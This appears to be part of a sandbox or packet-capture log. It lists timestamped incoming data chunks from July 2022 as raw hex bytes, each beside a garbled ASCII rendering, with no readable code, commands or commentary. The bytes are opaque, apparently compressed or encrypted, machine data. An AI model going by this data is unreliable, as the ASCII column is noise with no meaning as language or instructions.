                                                                                                                                                            2022-07-07 07:51:12 UTC2131INData Raw: 6d d8 b1 8d c9 10 5d 4b ca dd 04 a0 3a 70 b4 cf 14 7c ce 88 84 b5 24 b0 b2 fd 49 cd 2f e0 12 b8 54 d6 74 48 1c e9 b0 00 66 08 d8 70 1e 35 55 5b 84 44 5d 70 14 9a 43 6c 52 02 54 e0 b5 83 37 fb 6c 16 83 14 4e 0c c6 fb 5b d3 da a4 9e 55 c6 61 8f fc c1 c3 ae 03 76 b9 63 64 5b 3e 23 d8 e9 43 12 a0 4d 70 0a 29 b8 78 71 88 e3 30 75 db 34 e7 48 82 1b e5 64 4e 9d fc 75 25 76 9c 49 32 98 14 29 1a fd 9e a7 bc d2 c5 57 93 ef da 8b 24 16 e5 6c 8e 58 bd 5e f8 36 12 15 73 b6 5a 20 36 03 d2 d8 19 ff 9c 46 aa 87 19 c9 4f 8a ad 07 2d 17 57 e3 f7 68 81 6e 22 e1 f3 8f 6f 31 e3 a7 2a 84 7a d1 db 47 bc 60 e2 00 a1 55 53 e8 d6 64 9d aa d1 47 52 e1 24 96 e4 4a c0 6b 38 1f b4 82 19 66 69 50 3a 0d 16 2d da 8c 6e f9 5c 3a b7 f2 7b ea ac 0b 03 ef d8 6b 03 3b 8c 04 bf 6c 3f a1 07 45
                                                                                                                                                            Data Ascii: m]K:p|$I/TtHfp5U[D]pClRT7lN[Uavcd[>#CMp)xq0u4HdNu%vI2)W$lX^6sZ 6FO-Whn"o1*zG`USdGR$Jk8fiP:-n\:{k;l?E
                                                                                                                                                            2022-07-07 07:51:12 UTC2147INData Raw: 70 96 bc 79 7f 8f 84 6f 6e c5 56 38 66 ff d8 97 c1 ca ec 26 11 06 52 b6 91 09 16 b8 d8 ed 57 87 4b 57 89 8d 65 4b c7 6a 15 d0 5e 11 f8 69 8c 8d 64 1c 9b ac c7 e1 45 2b c1 7c b1 a3 6e 10 fe 8a 6b 69 12 45 06 62 65 1b b3 fe a1 3b 0d 1b 94 cf 97 12 fb 53 0a f6 84 35 6d f7 72 2b 0e b4 64 29 d6 b7 8c 3c a8 15 f7 ac b9 5c 7a 5a c8 96 7b ae cb 07 2e 27 18 63 5f 98 23 46 ce ca c9 b1 dc 98 09 e3 a9 60 1b 83 2f a7 8e 72 2e 6c 38 e8 4a d3 e2 89 a4 bd 6c a3 b6 05 af 4e 28 f0 46 df 37 92 fa 16 76 a0 ac 67 6c 76 47 a4 ae 94 62 b4 0d fd 50 9b c5 0b 81 b9 df ba 91 a5 49 9e db b7 9b b4 92 3e cd f8 4f 64 34 26 8f 9e 58 b7 a7 fa 50 41 dd c8 20 5f 03 28 7d 30 cc e2 a1 09 a0 69 d9 e6 8c 17 99 5d 8b b2 ec 78 d3 8f 97 e7 bf d8 ee ed f1 a4 01 84 26 c6 8b 0c 8b fb 78 02 15 f2 cd
                                                                                                                                                            Data Ascii: pyonV8f&RWKWeKj^idE+|nkiEbe;S5mr+d)<\zZ{.'c_#F`/r.l8JlN(F7vglvGbPI>Od4&XPA _(}0i]x&x
                                                                                                                                                            2022-07-07 07:51:12 UTC2162INData Raw: 8c 6a 66 a4 84 e1 80 45 95 6f 8b 13 f5 71 15 75 a0 0d c4 c9 35 2c 31 df 8d 5f 12 e9 8c e6 d8 95 12 3d ee 5e 48 a5 c7 f4 f9 22 0e af 3a ca db 4a 59 c2 82 a2 b0 53 9c f5 9b 40 aa 6b f5 9f e4 49 21 dc ee 16 4f c2 bf d5 d8 dd 52 9c 5f 34 2b ce ef ea dc 46 e8 cb 7f ed 0e bb 97 91 3c e8 37 62 0b 3e 5f a2 15 69 91 0c 37 cf 01 35 91 ac 19 e8 b6 7d 06 6e e8 70 3b 2d 38 2b 67 87 75 a2 93 1a 28 58 79 71 90 e3 dc 33 1a 73 be 87 5e f4 bf eb 24 83 8d bc 27 11 11 86 14 53 52 30 7a 56 40 3f bd ef 3f 7f 52 7e 83 88 b9 4f ab a5 e9 e9 db 92 6e 6d 1e 16 0b ee 53 7b c4 7a d3 e7 77 26 1b db c4 fd af b1 f1 2e 3c 8a ea d1 dd 83 61 f5 1e af 57 be c4 6a 9a a5 85 45 f3 a7 d8 79 fd 6e 32 ad 3a 43 ca f7 e0 74 cc 38 1b d0 1f 32 d2 1c ab a3 2c 9d d8 05 aa a9 ba ec c8 bb 44 8b 9a fe 5f
                                                                                                                                                            Data Ascii: jfEoqu5,1_=^H":JYS@kI!OR_4+F<7b>_i75}np;-8+gu(Xyq3s^$'SR0zV@??R~OnmS{zw&.<aWjEyn2:Ct82,D_
                                                                                                                                                            2022-07-07 07:51:12 UTC2178INData Raw: 39 ff 35 53 44 ff 37 75 6d 67 f3 26 25 93 e4 28 e1 8b e2 21 0c c3 92 89 5a 54 54 23 35 22 24 00 cf f1 f8 c0 96 fc ff ca 17 42 3f 75 34 7b a4 b6 d8 12 d6 a1 85 97 79 b5 17 27 30 17 30 d6 4a 6e 9f dd 30 1f 73 89 0b b2 f4 76 08 e4 59 dd c3 c8 fe f7 e6 2d 2f 02 ea bd 95 67 48 b3 a8 4a 79 8d 82 2b c4 8d 49 ec 49 f0 42 4e f9 c0 cf cf 29 87 b0 27 48 d9 a9 e5 d1 88 8c 24 dd 86 9b 31 b7 29 30 2b ea d7 74 e9 68 48 7f 38 6e d5 44 7f 0a 7b 84 c0 9a b5 38 42 dc 90 e6 2c 3d 73 3a a5 8c e1 37 0d b3 45 70 20 ec 12 87 b2 02 c2 b5 2f b8 0a 90 0a ae de 86 7e fd 8b c1 82 5b b9 13 97 f1 3f d6 0c 51 a2 3c dc 8f 9b e6 a6 a7 33 68 fe 8b 84 75 7e 27 a1 36 ab 9f 76 2b 2c 5d 4f 49 c2 98 d7 c0 7c 4f f0 de bb a4 4c 27 dc 84 8a cc cf 8d 2b 4c 42 83 02 c9 bd 40 2a c7 df 57 e9 b0 a0 84
                                                                                                                                                            Data Ascii: 95SD7umg&%(!ZTT#5"$B?u4{y'00Jn0svY-/gHJy+IIBN)'H$1)0+thH8nD{8B,=s:7Ep /~[?Q<3hu~'6v+,]OI|OL'+LB@*W
                                                                                                                                                            2022-07-07 07:51:12 UTC2194INData Raw: 15 06 7b d9 02 09 09 2d d4 af 9b fe ee c7 5a 0b b9 b4 e5 d2 b8 d4 88 d7 43 a4 b4 d4 96 4a b7 0c f2 6b cc ba c0 4f b0 15 61 30 77 10 ba 08 b1 9d 88 03 96 82 40 69 fe 3e 6e 4b a3 9d 31 bd 96 c9 98 dc 76 cd 07 98 77 d5 d7 5a 5b a5 6e 31 e1 81 27 fb 61 b4 54 fa cb 27 08 6b c5 36 8d ac 81 c9 72 c5 20 fe 03 f1 d3 76 7e 12 c3 d8 39 e1 e9 56 83 ed 68 71 33 d2 61 ba f4 ac 2d ce 98 0e 99 2c d8 21 02 1c 24 15 d0 42 ff 02 7c 57 a5 cf ed 20 c3 95 00 68 ca 67 9d 9c 36 13 2d 0b 43 96 40 9f 1f a0 75 6b d8 e6 ab 37 50 89 32 3b 73 61 0e 51 be 9a 83 1e 62 6c 75 33 0f af 54 c3 35 93 70 12 c8 d9 fa a3 7d 36 54 e0 dc 8b 33 a8 58 c6 3b 00 39 b9 f5 fc 5b da db c2 e5 3f 09 c1 d8 42 88 b5 7f dc e6 b4 a9 8a fb d9 21 95 d7 03 e6 12 ad 7d ff aa 8a 38 2c af a5 4c 04 8d 60 90 ef 6c dd
                                                                                                                                                            Data Ascii: {-ZCJkOa0w@i>nK1vwZ[n1'aT'k6r v~9Vhq3a-,!$B|W hg6-C@uk7P2;saQblu3T5p}6T3X;9[?B!}8,L`l
                                                                                                                                                            2022-07-07 07:51:12 UTC2210INData Raw: da 58 06 75 fb 16 d6 aa c0 76 ac 9b 38 4c a2 12 4e 96 c9 1a 07 2c 21 ed 6e 39 30 a6 0a 59 28 dd c4 ea 06 b1 5f 60 d2 1f da 89 0d 05 90 eb 65 f1 89 38 49 7e d5 63 a3 0f 46 8d f7 b8 6f 84 25 c7 a1 ed 5d f7 25 3b 9c 5a 2e c1 74 12 c3 dd 9d be 6b 26 00 da 0a 03 74 3d d3 7e ea be 6e 06 4c fe e8 88 03 6a 7f 87 32 2b 63 f1 de 1e 8c 2e 9b c2 b7 82 79 2b b1 89 f1 50 60 58 f2 85 c9 8f 4e f0 b9 c0 38 4f 41 ff 6c 4e ba 8a 77 61 6b cf d0 2c de a8 3e 54 5a fc 8a 70 85 c7 8c bc 24 06 1b 2a b1 76 bf 24 04 1d ec d5 87 b7 19 4d ab 93 2e 9f 24 2a a3 93 7c ac b5 41 74 9c e2 4d f3 36 60 b8 11 32 7a e7 92 ec d0 f9 51 21 ab ab d2 ad f8 fa b1 21 b6 87 55 90 79 7b f0 32 c7 e7 7f 46 10 c5 a0 6b 72 12 32 69 b6 c0 c4 af 32 fb 98 8e e9 ca fd f0 07 97 ef 65 7f 9f 42 8c 4a f9 d2 fb cf
                                                                                                                                                            Data Ascii: Xuv8LN,!n90Y(_`e8I~cFo%]%;Z.tk&t=~nLj2+c.y+P`XN8OAlNwak,>TZp$*v$M.$*|AtM6`2zQ!!Uy{2Fkr2i2eBJ
                                                                                                                                                            2022-07-07 07:51:12 UTC2226INData Raw: 1d af 39 f2 7c c2 6e 8e f7 e8 55 7b 14 9a 36 e8 fc a4 19 8b a0 3f c2 57 be c6 bf 05 59 f8 60 4f 47 83 a5 b7 44 d1 12 8a a6 af b4 69 d0 bd f8 05 75 09 ab d8 69 46 8f 62 90 87 d0 53 7e 9c 08 72 6b eb 6c 0c b0 8c 38 6f 88 22 48 af 1f 9b 6e 5c 0c 57 6b 90 a4 23 55 57 41 e0 c0 fc 6e e4 6a 9b 35 1c 37 99 19 7a 72 b1 4a 54 6e e3 04 55 2c 17 27 e2 ae db e4 1f a0 31 9e f6 ba 38 e4 eb 40 8e 53 d8 ed e4 8b 00 f0 70 7c d5 2a 85 aa 71 dc 97 bd c3 47 f9 51 aa 49 e1 0f 6e 87 b4 d5 fc c5 23 fe bf 0e 01 fc a2 eb 21 f4 84 a0 ba 6b fb ed 2a 33 cd aa d6 f6 05 d1 77 62 ec 52 d2 88 6d b0 e9 96 11 dd 8c 06 2a c1 19 ba ca 46 f0 08 5c a4 44 b1 89 f3 79 c3 00 c5 48 76 64 a2 57 ea 60 10 8f d8 00 a3 de 1c 28 21 89 12 83 56 d7 32 99 73 89 30 91 46 4a 85 b1 8f 6f a0 3e ad a6 51 01 10
                                                                                                                                                            Data Ascii: 9|nU{6?WY`OGDiuiFbS~rkl8o"Hn\Wk#UWAnj57zrJTnU,'18@Sp|*qGQIn#!k*3wbRm*F\DyHvdW`(!V2s0FJo>Q
                                                                                                                                                            2022-07-07 07:51:12 UTC2242INData Raw: 8e 94 ac e9 05 be 88 a4 7e 83 54 4f 8a 9a e1 16 34 6f a1 6a 70 e1 ce b3 38 00 54 96 da 53 b9 bb 9f 1f 35 bf 36 69 03 8c fa 24 70 2d 88 bd 8b 28 68 15 4c d5 9f 14 3e 30 5a f4 03 63 89 a3 68 c4 d8 53 0c 10 c3 3b 46 12 31 57 75 8a 8a bc 4e ca db da 3e a2 3e bb f8 44 17 04 c1 6b 16 e6 13 d4 6e 51 3c 52 c9 34 45 4b ab 71 16 4a 76 c7 69 31 1e 64 6f 85 0c 6c 92 40 28 d1 72 d4 10 0d b1 36 9f 55 31 6d 01 5f 61 cf 4b c5 df a5 dd 19 b7 6a 10 82 5c 5e ea 85 ae a5 9a dc 5c 17 86 90 25 39 51 39 7a 50 ab 72 1c e2 c1 cd 1f 8b 1d 46 73 53 5e 6b a2 23 b2 6c 1f 36 7c d5 12 5d 29 12 94 da 37 6b d9 9c 80 fe f2 04 3c f5 40 33 11 c0 28 85 8c 63 fb da dd 3d 47 8e 80 16 18 81 71 8c 00 7c 28 50 d0 ec 26 71 c8 57 6b 20 e8 3e 24 4c e3 49 55 c2 65 44 ba a1 44 6b 7e 87 fb 51 36 e1 d5
                                                                                                                                                            Data Ascii: ~TO4ojp8TS56i$p-(hL>0ZchS;F1WuN>>DknQ<R4EKqJvi1dol@(r6U1m_aKj\^\%9Q9zPrFsS^k#l6|])7k<@3(c=Gq|(P&qWk >$LIUeDDk~Q6
                                                                                                                                                            2022-07-07 07:51:12 UTC2258INData Raw: 05 e0 35 e3 2c ba 9b 1c 65 32 d8 30 85 b2 e8 c6 e2 92 32 59 b8 76 61 40 9a 3a 03 de 04 a9 4d 37 32 31 6d 56 8f 56 3e 40 7a 91 f1 9c b9 44 09 02 41 02 8c 02 89 aa 67 9f 35 3b 70 9d 81 f0 7a 88 ec 27 fb 0d b3 2d 45 1e 7e 51 97 a4 70 5a ba a4 80 b7 ec 95 d5 d7 49 23 20 54 2a 38 af 03 5b c6 be d3 8f 85 c7 8a 87 d1 2e 7c 99 24 2a 9f 2c 0d a9 58 ee 75 e7 fb 0c 96 59 7b 57 ad dd 8a 3f 56 11 d4 c2 01 9a 0a 9d f9 45 9b 21 a0 8e 44 40 c0 58 8e 5f b8 7c 62 6b 4d ba 17 00 a6 4f 78 e2 da d3 ae 7b 98 3a 78 91 0f 02 17 2a cf 02 f0 17 58 f9 9c 7a 76 d4 61 9f d6 a6 1d b8 87 77 9a ca dc 76 69 48 70 24 3d 77 2f fc 77 f6 7b 34 78 8c ff 1f 76 ed e4 89 0d d2 c8 58 ec 14 09 4e 5f db c1 41 5d e2 a5 20 f6 b4 70 03 76 8e ab 50 50 94 12 d5 d5 3c 9c d6 e6 d9 9e dc 2a 20 f4 d3 2f 88
                                                                                                                                                            Data Ascii: 5,e202Yva@:M721mVV>@zDAg5;pz'-E~QpZI# T*8[.|$*,XuY{W?VE!D@X_|bkMOx{:x*XzvawviHp$=w/w{4xvXN_A] pvPP<* /
                                                                                                                                                            2022-07-07 07:51:12 UTC2274INData Raw: b5 5e 5d 8d 63 a9 28 b7 00 62 53 f2 c4 3c 12 8f 50 50 fb 84 46 77 0b 72 96 6c 58 84 e0 4a 9e b4 54 ff df 51 db c3 9f 15 f2 d9 a8 e6 de a9 24 d8 99 60 1f 84 72 53 5f 9a 9b 9d be 56 cd ab f4 24 1f 11 1a 1e 92 df ed 39 09 fb bc 55 23 bf fe 0e 59 55 5e de 3e da 82 3f a7 09 c8 cb 41 6e 51 1f d0 fb d4 d7 c5 cf ac be f6 bb e5 dd 94 31 00 79 01 65 7c 0e 5f db 47 98 5b 5c 26 92 52 0a e4 1f 31 21 89 44 28 c2 c3 9e 25 59 0d 70 2d d4 bb 42 55 2b 63 0d 3b 4a 53 e5 3a ce fc 8c fd 47 17 09 44 48 a3 52 af 60 23 98 68 e1 84 67 0c c5 6c 3b 0e 3f a4 23 33 d5 3f 6a 98 9d 39 da cc 47 b7 81 9c 2c a5 6f 28 20 ae c3 95 70 50 01 6e 46 04 df af 75 a1 dd ff 74 57 53 eb 11 43 0b 47 a8 0c dc d6 db 7d ee 22 07 cc ca 2e b6 4b 77 c4 45 1c 6b 17 89 a6 29 82 2a 47 37 55 57 19 f2 9e 3b 23
                                                                                                                                                            Data Ascii: ^]c(bS<PPFwrlXJTQ$`rS_V$9U#YU^>?AnQ1ye|_G[\&R1!D(%Yp-BU+c;JS:GDHR`#hgl;?#3?j9G,o( pPnFutWSCG}".KwEk)*G7UW;#
                                                                                                                                                            2022-07-07 07:51:12 UTC2290INData Raw: 97 79 f0 b5 66 b0 62 f4 e0 7d 1b 16 0b 36 73 49 48 c0 ad 35 24 00 d0 5f 5a a4 89 80 c7 e9 f0 ba 71 ef ba 52 32 57 32 ad df a5 7e 23 90 2e a8 28 50 5a a5 f4 45 3a de 3f 2a 88 74 ed 9c 6f 5a 98 12 5d 2e 0b c8 1e a7 84 a2 da 05 5c 8b 13 c2 58 1a 1d 75 ac e8 5c fa 0c 67 83 38 6f 67 24 cb e9 05 99 d9 1f ef d6 c5 a5 28 7f 5c 2c 48 04 7d df b9 ba 70 b9 65 5a 60 cb 2d c1 7d c2 01 6c 5a ba 66 0f 59 7c ad 59 9a 5a 39 f0 09 5b 22 41 a0 f2 a6 de d5 70 99 6c 81 71 ae 5a 47 4d 54 29 e8 eb 28 b7 49 56 f0 2c e4 56 b3 01 da 18 90 27 88 2d 6b 49 5f c4 93 1f 64 6d 20 7a 42 9e 0d 99 6e f0 8d 7d 59 cd 83 17 63 4b 08 72 6a 88 5c 00 a6 2f 96 52 04 93 56 50 5e 27 4f 28 3a f9 8e b2 04 b0 84 9b 95 dd 3d f1 35 e9 34 98 b0 4e fa 7b cb d0 b6 f9 07 89 5b c8 9f 15 76 65 a9 3f 73 fa f9
                                                                                                                                                            Data Ascii: yfb}6sIH5$_ZqR2W2~#.(PZE:?*toZ].\Xu\g8og$(\,H}peZ`-}lZfY|YZ9["AplqZGMT)(IV,V'-kI_dm zBn}YcKrj\/RVP^'O(:=54N{[ve?s
                                                                                                                                                            2022-07-07 07:51:12 UTC2306INData Raw: e1 59 13 2e 32 21 24 99 c1 16 6e d6 81 13 ba 28 e9 78 3c 9a ab 8a 7b c0 68 cb d7 2b 5d 33 a9 d2 68 a7 52 88 73 a5 63 b2 61 c8 be 06 2f 99 52 3c 41 4d 0a af b3 23 c6 e4 af e9 70 a6 8f e2 a8 59 05 51 2c b4 50 94 fa 67 b4 cf a3 aa 12 10 56 7f cf 14 3e ab 52 cd fc 76 3f 41 60 b6 83 c3 18 e0 e1 81 2e 4b 88 87 1c c3 49 4d 0c f6 1f c3 3e 85 8d 22 bc 87 8d a5 52 ee f8 2e fc 8f 48 70 6b 74 89 0e ef d1 44 b6 fb e2 29 0b 93 a0 1a 5d fa bb ef 0b 65 8c cd e9 da a6 88 9f df 33 dd bd 9d f9 7b 56 bf 8e 1b 59 47 a5 bc 1b 45 2f 4c 62 be 5d 1a ec 07 89 ec 8c 4f d5 7f 5e bf 01 bc 84 39 f3 51 9d 54 29 4e ed bc 6f e3 8a 83 a4 3e a4 2e df e5 f5 ab cb 50 70 ad 7c 03 11 9b c8 84 d2 cf 91 28 23 d7 0b 73 63 29 ee 52 2a 65 91 40 ec d4 ba c7 75 4f 02 c0 ac c7 3e 3f 19 75 db 17 85 cc
                                                                                                                                                            Data Ascii: Y.2!$n(x<{h+]3hRsca/R<AM#pYQ,PgV>Rv?A`.KIM>"R.HpktD)]e3{VYGE/Lb]O^9QT)No>.Pp|(#sc)R*e@uO>?u
                                                                                                                                                            2022-07-07 07:51:12 UTC2322INData Raw: 78 ef be d0 6a 3e c8 a8 e9 19 a9 2a 5d 3c 33 be 31 02 b6 16 76 cf 85 b6 b4 f7 1d 76 bf 37 ea 3e 63 e8 e8 d4 9a 5c 08 1c 4f 70 a1 2b 2b bd aa f5 fa 54 b9 25 0b 71 47 ad 70 f5 3d a7 91 67 f4 ba 9a d0 a7 dc a8 d7 12 c5 23 94 ab 3c 19 fb f2 12 b0 fe 4d bd 0b fe 0e 0b 67 43 f5 29 ad e1 41 e7 2e 9b 2a ea 02 95 63 67 ca df f5 cf ca cc a5 a7 d7 7a 00 90 d7 8f fb 5a 13 cc 4c a8 64 6f 97 c2 d0 d7 13 2e c1 ce a2 d2 e4 cd 09 3c c8 19 a6 24 ad 4f b0 b4 4f fa 9a 71 22 7a 77 81 b1 42 5d b1 62 20 2e 31 7e a9 c8 db e4 65 22 10 40 80 a3 76 68 a6 b7 bd d0 6c f4 f3 83 9c 69 e7 f6 53 72 66 b1 63 b2 1b 97 3e 27 29 ed cf 8e e0 cf 89 f8 39 79 0f ea ea 5b 47 91 83 a4 5a 25 27 ad 6a 45 02 58 27 bc fb 34 3b 09 e3 5a 2f b0 17 45 d3 2d 98 4a c8 36 a1 51 1b c2 15 eb f8 61 52 45 3c aa
                                                                                                                                                            Data Ascii: xj>*]<31vv7>c\Op++T%qGp=g#<MgC)A.*cgzZLdo.<$OOq"zwB]b .1~e"@vhliSrfc>')9y[GZ%'jEX'4;Z/E-J6QaRE<
                                                                                                                                                            2022-07-07 07:51:12 UTC2338INData Raw: 9b 32 74 3b 1e c1 a4 de 60 2d 44 cd c1 c4 4c 1f 5e 0b ed 27 84 a0 52 fc d5 03 7d 46 d0 d2 25 d7 c7 8d 96 32 1d 6e b6 85 78 b3 83 d5 13 97 cc f0 fb ed 4d 2d 95 4a 93 ff b5 46 eb 67 4b 8d 19 55 47 8b 87 4b 38 f1 2d ba 2e 45 22 81 6d 87 49 2d 73 45 00 87 1e 66 99 88 04 16 2c 8a 29 9b 84 3c f5 e5 ae bb 05 65 06 43 23 30 43 e7 7d fd a4 8c fb f0 9f 2f a9 9c 9b 06 3d eb 89 52 56 3b 2f 15 06 9e d8 5f c5 5e fb e0 bf 73 66 68 41 a1 08 1c cd 7d 37 ce 23 f0 6a e4 2b b0 b6 a5 5d 3f 5f 3c c7 84 22 d3 10 6d e9 32 02 bb 71 0b 47 58 97 8c 2d 21 28 3a dc fe 0b bb 80 85 f1 a4 5b 54 08 72 c9 28 fc 84 c0 b2 ef f8 8e 06 3c 00 b2 e2 83 56 1f 16 62 9c 73 02 40 19 04 79 c4 1b a1 1d 2f 21 9b e1 91 e7 d2 af 23 a9 50 e6 77 d4 44 72 82 52 6b a2 6f 8a 17 da f9 8c aa a6 eb 8a 35 61 8a
                                                                                                                                                            Data Ascii: 2t;`-DL^'R}F%2nxM-JFgKUGK8-.E"mI-sEf,)<eC#0C}/=RV;/_^sfhA}7#j+]?_<"m2qGX-!(:[Tr(<Vbs@y/!#PwDrRko5a
                                                                                                                                                            2022-07-07 07:51:12 UTC2354INData Raw: 36 75 a9 40 60 f7 9f 33 d4 ed 58 25 e5 48 b3 d7 00 ec de 71 e0 ba ce be 02 3f a5 2f 90 10 15 f4 8b d1 82 ba f1 6d af 80 d1 e2 68 73 46 aa 8f b7 ee e7 f4 25 9b 1f 86 58 28 e1 36 8c 10 4a 80 fe 24 8c aa 29 fe 30 a7 da d4 0a 8b 22 4d 4f fc d8 ce a9 27 ea 9d ef 4c c5 43 be b3 72 d4 53 a9 4b b7 af ed ea b2 f4 13 63 cc 3a 77 d0 87 3b ec 71 ca e9 8a 36 5d 97 17 62 f9 0a 18 a1 97 9e fa 32 8f a5 64 72 22 6f 61 09 25 30 ef 64 b2 1b e8 dc a9 cf 90 0b b8 e5 73 b1 49 39 a1 a8 7f d3 bb 71 d8 4a a1 55 aa 8c 56 1e 2c 2c c3 76 ee 50 3a 63 fa 2a ea e5 82 a5 c8 8e 76 87 d2 ae 91 04 bf 66 dd a9 d5 35 92 e8 5b 82 8e 1a ea 12 38 8e bb 2d ec cd 76 86 cb 1e 93 74 dc 0e fb 99 97 85 c0 14 2c ea 32 16 c9 a1 e3 1d 70 b7 98 15 45 52 a1 86 06 ea d7 50 bf 6c 66 04 c3 b5 7d 0d 75 fc 94
                                                                                                                                                            Data Ascii: 6u@`3X%Hq?/mhsF%X(6J$)0"MO'LCrSKc:w;q6]b2dr"oa%0dsI9qJUV,,vP:c*vf5[8-vt,2pERPlf}u
                                                                                                                                                            2022-07-07 07:51:12 UTC2370INData Raw: 37 c6 9f 38 8d f8 42 81 83 d5 17 e0 9d eb 62 b2 9d ca 97 22 2d 5f 1d d3 f9 7e b8 b2 9e 0b 5e 9c 3b e4 8d f1 0d 9a 7d 95 f3 c0 2d 52 e9 7b 07 a7 a6 cc 29 57 07 65 d4 81 03 f2 fb 36 93 5e 95 e4 b7 a3 73 10 f2 69 7c e1 41 7b c3 34 4e 9f d8 14 28 1a ad 4a 3e 6f 39 00 3c c8 88 aa 5b 82 a1 9f ea 8a e6 45 4c c7 11 88 0a da 8c 44 a0 50 d7 30 35 e0 49 58 44 fb 82 33 ef 24 19 13 6d 40 26 d2 2a 96 25 c8 b7 c8 3e 7c 15 4b 99 d1 6e 91 31 57 5a 7b 10 b8 13 f9 07 90 69 67 9d 9b 03 19 1d 37 38 f3 0e 10 12 a4 5b d7 70 e2 b6 3e ad fe 3d a5 fa 90 1e db 5f 94 b9 43 ce eb 5d 42 98 9e 4d 52 80 c6 22 25 af 5d 3e 6b 81 76 71 c3 1e 7a 46 ca 09 f9 62 a4 8e e5 c2 0e 5b a9 b1 39 0e e7 a7 b4 62 ab 1e 63 00 57 c5 f2 9e 6c f6 8b a1 4a 97 b2 0a 15 91 ec aa 5b cf a0 da 7e 22 fc a3 98 05
                                                                                                                                                            Data Ascii: 78Bb"-_~^;}-R{)We6^si|A{4N(J>o9<[ELDP05IXD3$m@&*%>|Kn1WZ{ig78[p>=_C]BMR"%]>kvqzFb[9bcWlJ[~"
                                                                                                                                                            2022-07-07 07:51:12 UTC2386INData Raw: fd d7 08 11 7d 57 f1 8a f0 73 71 6b cc 6c 02 09 b1 d1 93 65 44 d7 60 1b da 68 68 d2 7d 66 24 20 9e 19 a7 64 53 4c 0c eb 88 7d 45 3d 7c 87 f3 c0 ff 92 a4 73 43 0c f5 73 71 79 b3 fb 02 72 2e 1b 2f 1e aa c9 b6 6d 34 13 a4 f8 c8 9c 7f bd 33 7a 39 4c 59 a8 73 cc 5a b6 75 a1 16 c8 06 fb 99 06 7b 3f a5 fb 08 b2 4a 5d 26 a7 76 bd c8 ee 4d ce ad 01 42 45 b7 2c 5f 2d 24 4f 4c c4 a0 4b 17 27 78 47 55 04 bc 21 2b a4 99 a8 fe 38 c9 6f 9d bd e2 99 f1 30 b6 b8 5e 11 56 3e 65 86 01 64 32 70 80 21 21 6b 0d 95 04 21 cd 22 ce b0 3a 92 db 07 13 0f 63 eb 05 ed d9 1e a9 ed a7 71 37 e6 f3 b6 65 03 89 3a 1b 4b d4 53 1a c4 4e a3 dd 21 eb 94 f1 55 9d a9 1f 4e ab 14 81 6e a7 63 f0 bf f4 06 0b fb ca 94 64 4c da 18 89 65 c5 84 9a 57 73 0d e5 63 bf f2 f8 d5 3d 46 a9 0c ac 75 a2 e5 75
                                                                                                                                                            Data Ascii: }WsqkleD`hh}f$ dSL}E=|sCsqyr./m43z9LYsZu{?J]&vMBE,_-$OLK'xGU!+8o0^V>ed2p!!k!":cq7e:KSN!UNncdLeWsc=Fuu
                                                                                                                                                            2022-07-07 07:51:12 UTC2402INData Raw: 0f 45 79 5e 9f d7 18 a3 94 12 c0 6c df 17 c8 e6 05 31 00 18 37 d4 23 63 f1 57 d9 55 98 07 3e 71 c3 e9 28 df 4a 18 6b 35 f8 d9 66 cf 2c d6 54 8c a1 b2 19 32 21 7b 9d cf 2a d9 6e ee 31 c4 3f ca d8 c4 40 d2 f4 16 33 e2 d7 b6 21 b8 24 0b 56 8c dd c8 95 f5 6a 5a 21 1f 3b e9 12 2b 9b 5c 67 93 89 b6 f6 1f 17 9b 3b 21 ed f7 4e 3a 36 59 73 e8 c9 49 20 6e 89 29 bb 11 b9 f6 71 2d c8 bd ba 31 ae e5 b8 94 e4 fd 68 64 c5 6e df 08 78 b1 a3 b6 d6 8a d5 5e e7 ef a6 f1 ed ba 3e 4f 24 23 9a db 0c d0 88 ba 77 d3 47 3b 1f 02 21 71 46 de 3c 81 15 a6 86 a7 99 c2 76 65 3f bf d0 fe d9 cf 05 d6 d5 12 07 0a 4f 2d bf 54 45 55 5b 24 9c a6 27 58 42 2c ab 2a 0e 8f ba 43 d8 05 25 04 cd 2a 50 ee 62 b6 a4 2b ef 89 77 d9 5e 77 b3 44 e1 97 a6 53 02 77 fe ee b1 cf 13 01 50 49 d9 46 c0 bc cb
                                                                                                                                                            Data Ascii: Ey^l17#cWU>q(Jk5f,T2!{*n1?@3!$VjZ!;+\g;!N:6YsI n)q-1hdnx^>O$#wG;!qF<ve?O-TEU[$'XB,*C%*Pb+w^wDSwPIF
                                                                                                                                                            2022-07-07 07:51:12 UTC2418INData Raw: c3 6e 48 36 fa b5 48 1f 7a 56 c6 6d 8e ce d4 44 a7 12 63 11 1c b7 7d 59 46 fb 1c e2 32 0e 21 22 db 58 d8 36 eb 2d ab dd bb ae 6c 4c 1a c9 d4 42 96 59 f9 68 69 cc b3 97 b3 81 fe 47 c6 c1 b1 6b 65 d1 e4 47 2c ef c7 9e 38 1f 9d aa 9f 1a c9 24 7c a3 ad 78 bc 0f 71 6e 7e f3 a0 bd 22 1e 68 e0 43 5e b7 08 4f 87 db 19 e4 a9 6f cb 71 17 68 e3 52 ab b2 e3 c3 2c ee b7 6d fc cb cf e6 31 1a 56 d9 2c 08 df 01 54 35 58 ea 49 8c 0e 05 23 b7 f5 3e 7f 21 2c 1c bc 18 1c 9c 57 cc 43 84 cc 18 9a cf 0a 3f 0a 27 bc 48 9d 84 58 9b 36 fc 32 08 e8 4d 7c ab d0 bf 86 89 80 f4 c5 e1 c9 85 cb e0 78 51 be 3a c7 b2 2f f4 80 72 74 5f b7 ca ba f6 64 f2 02 ed 54 9c 1d 0b f7 0c 14 7e b5 cb 74 6c fe c2 82 71 f0 f9 7a 9c 58 20 34 9d 4a d7 e1 4c fa 7c 92 6f 26 de ff 65 66 ce e8 c2 3c 6f b2 79
                                                                                                                                                            Data Ascii: nH6HzVmDc}YF2!"X6-lLBYhiGkeG,8$|xqn~"hC^OoqhR,m1V,T5XI#>!,WC?'HX62M|xQ:/rt_dT~tlqzX 4JL|o&ef<oy
